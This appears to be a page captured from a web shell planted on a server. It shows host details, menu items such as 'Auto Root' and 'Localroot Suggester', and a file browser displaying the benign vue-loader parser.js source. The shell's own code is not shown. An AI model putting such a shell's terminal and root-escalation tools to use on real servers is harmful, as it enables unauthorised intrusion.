Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.140.201.179
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp_probe /
node_modules /
vue-loader /
lib /
Delete
Unzip
Name
Size
Permission
Date
Action
loaders
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
style-compiler
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
template-compiler
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
utils
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
.DS_Store
6
KB
-rw-r--r--
1985-10-26 08:15
component-normalizer.js
2.83
KB
-rw-r--r--
1985-10-26 08:15
loader.js
21.51
KB
-rw-r--r--
1985-10-26 08:15
parser.js
1.51
KB
-rw-r--r--
1985-10-26 08:15
selector.js
917
B
-rw-r--r--
1985-10-26 08:15
Save
Rename
const compiler = require('vue-template-compiler') const cache = require('lru-cache')(100) const hash = require('hash-sum') const SourceMapGenerator = require('source-map').SourceMapGenerator const splitRE = /\r?\n/g const emptyRE = /^(?:\/\/)?\s*$/ module.exports = (content, filename, needMap, sourceRoot, needCSSMap) => { const cacheKey = hash((filename + content).replace(/\\/g, '/')) let output = cache.get(cacheKey) if (output) return output output = compiler.parseComponent(content, { pad: 'line' }) if (needMap) { if (output.script && !output.script.src) { output.script.map = generateSourceMap( filename, content, output.script.content, sourceRoot ) } if (needCSSMap && output.styles) { output.styles.forEach(style => { if (!style.src) { style.map = generateSourceMap( filename, content, style.content, sourceRoot ) } }) } } cache.set(cacheKey, output) return output } function generateSourceMap (filename, source, generated, sourceRoot) { const map = new SourceMapGenerator({ sourceRoot }) map.setSourceContent(filename, source) generated.split(splitRE).forEach((line, index) => { if (!emptyRE.test(line)) { map.addMapping({ source: filename, original: { line: index + 1, column: 0 }, generated: { line: index + 1, column: 0 } }) } }) return map.toJSON() }